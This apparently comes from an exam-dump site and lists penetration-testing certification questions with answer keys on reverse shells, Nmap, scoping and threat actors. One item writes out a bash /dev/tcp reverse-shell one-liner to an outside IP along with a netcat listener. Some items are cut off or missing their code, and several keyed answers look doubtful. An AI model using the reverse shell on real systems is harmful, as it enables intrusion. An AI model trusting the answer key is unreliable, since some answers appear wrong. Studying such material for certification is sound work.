- All Exams Instant Download
Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?
A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?A . nc -nlvp 443B . nc 10.2.4.6. 443C . nc...
Which of the following has occurred in this situation?
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks: ✑ Code review ✑ Updates to firewall settings Which of the following has occurred in this situation?A ....
Which of the following has a direct and significant impact on the budget of the security assessment?
Which of the following has a direct and significant impact on the budget of the security assessment?A . ScopingB . SchedulingC . Compliance requirementD . Target riskView AnswerAnswer: D
Which of the following will be returned?
A penetration tester runs the following on a machine: Which of the following will be returned?A . 1B . 3C . 5D . 6View AnswerAnswer: B
Which of the following Nmap commands should the tester use?
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?A . nmap -p 22 -iL targetsB . nmap -p 22 -sL targetsC . nmap -p 22 -oG targetsD . nmap -p 22 -oA targetsView...
For which of the following types of attack would this information be used?
A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profiles. For which of the following types of attack would this information be used?A . Exploit chainingB . Session hijackingC . DictionaryD ....
In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?
In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?A . Common librariesB . Configuration filesC . Sandbox escapeD . ASLR bypassView AnswerAnswer: A
When performing compliance-based assessments, which of the following is the MOST important Key consideration?
When performing compliance-based assessments, which of the following is the MOST important Key consideration?A . Additional rateB . Company policyC . Impact toleranceD . Industry typeView AnswerAnswer: D
While prioritizing findings and recommendations for an executive summary, which of the following considerations would De MOST valuable to the client?
While prioritizing findings and recommendations for an executive summary, which of the following considerations would De MOST valuable to the client?A . Levels of difficulty to exploit identified vulnerabilitiesB . Time taken to accomplish each stepC . Risk tolerance of the organizationD . Availability of patches and remediationsView AnswerAnswer: C
Which of the following BEST describes the abilities of the threat actor?
A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?A . Advanced persistent threatB . Script kiddieC . HacktivistD . Organized crimeView AnswerAnswer: B Explanation: Reference https://www.sciencedirect.com/topics/computer-science/disgruntled-employee
